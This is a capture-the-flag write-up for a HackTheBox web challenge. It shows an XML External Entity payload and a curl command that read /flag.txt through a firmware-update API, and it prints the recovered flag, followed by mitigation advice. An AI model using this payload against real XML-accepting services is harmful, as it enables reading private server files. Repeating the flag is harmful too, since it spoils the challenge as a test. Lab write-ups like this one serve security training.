Jailbreak - HackTheBox

Description

The crew secures an experimental Pip-Boy from a black market merchant, recognizing its potential to unlock the heavily guarded bunker of Vault 79. Back at their hideout, the hackers and engineers collaborate to jailbreak the device, working meticulously to bypass its sophisticated biometric locks. Using custom firmware and a series of precise modifications, can you bring the device to full operational status in order to pair it with the vault door's access port.

Target: 83.136.249.164:45064

Analysis

Initial Reconnaissance

Connected to the target and discovered a Flask/Werkzeug Python web application simulating a Pip-Boy device with multiple pages:

• STAT
• INV
• DATA
• MAP
• RADIO
• ROM

Vulnerability Discovery

1. Found the /rom page containing a "Firmware Update" feature
2. The page accepts XML configuration input
3. Discovered /static/js/update.js which reveals the API endpoint:
   • Endpoint: POST /api/update
   • Content-Type: application/xml

The XML parser does not properly sanitize external entities, making it vulnerable to XXE (XML External Entity) Injection.

Solution

XXE Payload

Crafted an XXE payload to read /flag.txt by defining an external entity that references the local file:

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///flag.txt">
]>
<FirmwareUpdateConfig>
    <Firmware>
        <Version>&xxe;</Version>
        <ReleaseDate>2077-10-21</ReleaseDate>
        <Description>Test</Description>
        <Checksum type="SHA-256">test</Checksum>
    </Firmware>
</FirmwareUpdateConfig>

Exploit Command

curl -s -X POST http://83.136.249.164:45064/api/update \
  -H "Content-Type: application/xml" \
  -d '<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///flag.txt">
]>
<FirmwareUpdateConfig>
    <Firmware>
        <Version>&xxe;</Version>
        <ReleaseDate>2077-10-21</ReleaseDate>
        <Description>Test</Description>
        <Checksum type="SHA-256">test</Checksum>
    </Firmware>
</FirmwareUpdateConfig>'

Response

{
  "message": "Firmware version HTB{b1om3tric_l0cks_4nd_fl1cker1ng_l1ghts_465a1624a0deb4d0c01f93bffa85a977} update initiated."
}

The flag content was reflected in the Version field of the response, confirming successful XXE exploitation.

Key Indicators

Use this technique when you see:

• XML input accepted by the application
• Content-Type: application/xml in requests
• Firmware update or configuration upload features
• Flask/Python backend (often uses vulnerable XML parsers by default)
• No explicit XXE protection (like defusedxml)

Mitigation

To prevent XXE attacks:

1. Disable external entity processing in XML parsers
2. Use defusedxml library in Python instead of standard xml module
3. Validate and sanitize XML input
4. Use less complex data formats (JSON) when possible

References

• OWASP XXE Prevention Cheat Sheet
• PortSwigger XXE Guide